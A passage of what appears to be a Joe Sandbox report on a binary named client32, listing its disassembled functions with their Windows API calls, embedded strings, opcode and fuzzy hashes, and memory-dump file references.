e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110774F9

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CopyErrorExitLastLongMessageProcessRectWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2755825785-2830328467
Opcode ID: 4f316e2ed6ddaff1f4214695c10b17982f8ef2501de7a4bdebe5d1d49fe5d49c
Instruction ID: 59158522108a3a71f1e5bb0466e943617169e98ae829cc3baa7e2fe2b27ff523
Opcode Fuzzy Hash: 4f316e2ed6ddaff1f4214695c10b17982f8ef2501de7a4bdebe5d1d49fe5d49c
Instruction Fuzzy Hash: 5841C271E00B46DBCB15CF68C9C8B6EB7F1EF44344F10856AD8569B644EBB0E940CB98

Function 11031B50 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 104COMMON

Download Yara Rule

Strings

Error. WindowsD not generated, xrefs: 11031C52
Error. ExitMetro code cannot init kbfilter, xrefs: 11031C39
Exit Win10 Start screen (%s), xrefs: 11031BA6

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle_memset$ClassCodeCursorExitFromNameObjectOpenPointProcessSingleVersionWaitWindow_strncpywsprintf
String ID: Error. ExitMetro code cannot init kbfilter$Error. WindowsD not generated$Exit Win10 Start screen (%s)
API String ID: 2171401249-3225996774
Opcode ID: 64892938fa0b6c1ee6d66ac4cfd7e9802a1b46fe4b434297f23fe30ead13f557
Instruction ID: fa832722e0390e9f8a25bf370b451ec2a36a1e68e963bc0416f7044736d9f8e9
Opcode Fuzzy Hash: 64892938fa0b6c1ee6d66ac4cfd7e9802a1b46fe4b434297f23fe30ead13f557
Instruction Fuzzy Hash: CD31297AD14219AFE715CFD49C417AEB7F8DB45619F0042AADC15937C0EB316500CBD1

Function 1109BA10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

std::exception::exception.LIBCMT ref: 1109BA91
__CxxThrowException@8.LIBCMT ref: 1109BAA6

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

IsA(), xrefs: 1109BA71, 1109BAEF
..\CTL32\IEFavourites.cpp, xrefs: 1109BA6C, 1109BAEA

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$ErrorException@8ExitLastMessageProcessThrow_malloc_memsetstd::exception::exception
String ID: ..\CTL32\IEFavourites.cpp$IsA()
API String ID: 718578146-3791668299
Opcode ID: b12d6e4dc6b71c10b54eb280e3135fd2dd5e651f4016ddce0ca02f92ac9511b3
Instruction ID: 7624444f065e86134ff3c2a17aeb4c10f29a945451a9ef01b718610c66489656
Opcode Fuzzy Hash: b12d6e4dc6b71c10b54eb280e3135fd2dd5e651f4016ddce0ca02f92ac9511b3
Instruction Fuzzy Hash: 2F31D5B6E00309ABCB10CF99DC81B9EFBF8FF44614F50492EE55AA7240EB756504CB90

Function 11067A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

_malloc.LIBCMT ref: 11067A9B
_memmove.LIBCMT ref: 11067AE5

Part of subcall function 11064920: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,B6DE5DE1,?,?,00000000,00000000,111827B8,000000FF,?,1107198F,00000000), ref: 1106497E

Strings

..\ctl32\Connect.cpp, xrefs: 11067AAE
buf, xrefs: 11067AB3

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _malloc$CreateEvent_memmove_memsetwsprintf
String ID: ..\ctl32\Connect.cpp$buf
API String ID: 1162646364-3943465912
Opcode ID: d4b9ca1636653a1cc2ad9cb7d2060fefedc96eb8f4ebc1fd6818e002ee42e9bb
Instruction ID: e2f0109f98c887b75e0c98d7d6589209688dc755d4fd90d658c03dcd3a535f1d
Opcode Fuzzy Hash: d4b9ca1636653a1cc2ad9cb7d2060fefedc96eb8f4ebc1fd6818e002ee42e9bb
Instruction Fuzzy Hash: 3F316FB5E00745AFD710CFA98C40B6BFBF8EB49654F00463DE959D7280E670A904CBA0

Function 110D12E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 110D1378

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

IsA(), xrefs: 110D12FC, 110D13A3
cchLen<=0 || cchLen<=(int) _tcslen(pszStr), xrefs: 110D132F
..\CTL32\NSMString.cpp, xrefs: 110D12F7, 110D132A, 110D139E

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcess_memmovewsprintf
String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
API String ID: 1528188558-323366856
Opcode ID: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
Instruction ID: ca0f400cc3ae87bce4a96c7d882a21a9a029a19775e55ac1937322abd3584148
Opcode Fuzzy Hash: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
Instruction Fuzzy Hash: 0C212639B007566BDB01CF99EC90F9AF3E5AFD1288F048469E99997701EE31F4058398

Function 1103F370 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_lopen.KERNEL32(?,00000000), ref: 1103F3E2
CloseHandle.KERNEL32(00000000,?,00000000), ref: 1103F408
_lclose.KERNEL32(00000000), ref: 1103F414

Part of subcall function 1115E8B0: FindWindowA.USER32(00000000,00000000), ref: 1115E8FA

Strings

8zi, xrefs: 1103F3C4, 1103F3F3

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseFindHandleWindow_lclose_lopen
String ID: 8zi
API String ID: 2856150766-881272250
Opcode ID: 1739d0554021a85f94ab0f8399e368c3e4a4c10317e33ffc7b3c9f8a58245885
Instruction ID: 1e7dfe103d0e106741b6de4d249849aed082494a073368a1fdb87980e60b06ce
Opcode Fuzzy Hash: 1739d0554021a85f94ab0f8399e368c3e4a4c10317e33ffc7b3c9f8a58245885
Instruction Fuzzy Hash: 3C214B75E002189FD740CFB8C880BAEBBF4EF48708F108169E519E7781EB75A901CB96

Function 110896B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,0000000E), ref: 11160E88

Part of subcall function 11160D17: RegOpenKeyExA.ADVAPI32(80000000,CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32,00000000,00020019,?,?), ref: 11160D4F
Part of subcall function 11160D17: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?), ref: 11160D90
Part of subcall function 11160D17: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 11160DB4
Part of subcall function 11160D17: RegCloseKey.ADVAPI32(?), ref: 11160DE1

LoadLibraryA.KERNEL32(?,?,?,?,?), ref: 11160E4A
LoadLibraryA.KERNEL32(hhctrl.ocx,?,?,?,?), ref: 11160E60

Strings

hhctrl.ocx, xrefs: 11160E5B

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressCloseEnvironmentExpandOpenProcQueryStringsValue
String ID: hhctrl.ocx
API String ID: 1060647816-2298675154
Opcode ID: 1515c5a980bb63e1af7bf7099e432547b006d5e2aeed3d9808fec87a56ded119
Instruction ID: 29a85e5adb823bcef9c03dae075ae2b4ea3bdd8fdf15b4c5e271eae4de8d38be
Opcode Fuzzy Hash: 1515c5a980bb63e1af7bf7099e432547b006d5e2aeed3d9808fec87a56ded119
Instruction Fuzzy Hash: DF118E7170423A9BDB05CFA9CD90AAAF7BCEB4C708B00047DE511D3244EBB2E958CB50

Function 11005940 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 11005981
ReleaseDC.USER32(00000000,00000000), ref: 110059BC

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11005970, 110059AA
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1100596B, 110059A5

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcessReleasewsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 3704029381-2830328467
Opcode ID: c633f50c0fdfeb7c59634bf7decd603260c8dc5fded95eba86501058678fa527
Instruction ID: 1cf781a21872bd9441bcd9bb2c78fcf7fe1041f1c585c9da4a5e29128da7e192
Opcode Fuzzy Hash: c633f50c0fdfeb7c59634bf7decd603260c8dc5fded95eba86501058678fa527
Instruction Fuzzy Hash: 8C21E475A00705AFE710CB61C880BEBB7E4BF8A358F10407DE5AA4B240DB72A440CBA1

Function 1105D500 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,?,?,?,?,1103FE35,?,?,Client,DisableThumbnail,00000000,00000000,Client,DisableWatch,00000000,00000000), ref: 1105D51E
LeaveCriticalSection.KERNEL32(00000000,?,DisableWatch,00000000,00000000,B6DE5DE1), ref: 1105D59E
SetEvent.KERNEL32(?,?,DisableWatch,00000000,00000000,B6DE5DE1), ref: 1105D5A8

Strings

Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d, xrefs: 1105D561

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d
API String ID: 3094578987-11999416
Opcode ID: c530e27155f7b3fdc2e9ca538483d963ca7dcdd1017b1d5184d653da29544702
Instruction ID: cd8e2c595cb3ca955c0a05eca4a83294a9fb2b4bfc4f95d4b2967c0930ade923
Opcode Fuzzy Hash: c530e27155f7b3fdc2e9ca538483d963ca7dcdd1017b1d5184d653da29544702
Instruction Fuzzy Hash: 6D2149B4500B65AFD364CF6AC490967FBF4FF88718700891EE5AA82B41E375F850CBA0

Function 1102D830 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,B6DE5DE1,74DF2EE0,?,00000000,111821CB,000000FF,?,11030776,UseIPC,00000001,00000000), ref: 1102D8E7

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D8AA

Strings

DisableGeolocation, xrefs: 1102D85E
Client, xrefs: 1102D863

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
String ID: Client$DisableGeolocation
API String ID: 3315423714-4166767992
Opcode ID: dbb94121e6bdbc62089f6995c33581202b9ff5ffeeb2b32f40ab8b535e19882d
Instruction ID: cbdab4fc78c667aa17d7f52ea236f8f509ff794b1425e8be210dc820fee18f51
Opcode Fuzzy Hash: dbb94121e6bdbc62089f6995c33581202b9ff5ffeeb2b32f40ab8b535e19882d
Instruction Fuzzy Hash: 4921D374B41365AFE312CFA4CD41FA9F7A4E704B08F10066AF925AB7C4D7B5B8008B88

Function 110B9680 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62timeCOMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B969F
MoveWindow.USER32(8D111949,?,?,?,?,00000001,?,?,?,?,?,?,?,?,?,110BA885), ref: 110B96D8
SetTimer.USER32(8D111949,0000050D,000007D0,00000000), ref: 110B9710

Strings

Max, xrefs: 110B9690

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InfoMoveParametersSystemTimerWindow
String ID: Max
API String ID: 1521622399-2772132969
Opcode ID: ec225463a539bc69afd1be9fe60c0d6d77afb2bfb6e5901e1a463c37379c6f26
Instruction ID: 87ccea237e2aa79ae125a3322bdb2c24729383307459d143463b3682e3a222a8
Opcode Fuzzy Hash: ec225463a539bc69afd1be9fe60c0d6d77afb2bfb6e5901e1a463c37379c6f26
Instruction Fuzzy Hash: A2213DB5A40309AFD714DFA4C885FAFF7B8EB48710F10452EE96597380CB70A941CBA0

Function 11125860 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

SendMessageA.USER32(?,000004FF,00000000,00000000), ref: 111258C5
DestroyWindow.USER32(?,00000000,00000000,00000000,00000000,View,BlankAll,00000000,00000000,00000004,00000000,?,?,11125C22,00000000,?), ref: 111258D9

Strings

View, xrefs: 1112587B
BlankAll, xrefs: 11125876

Memory Dump Source

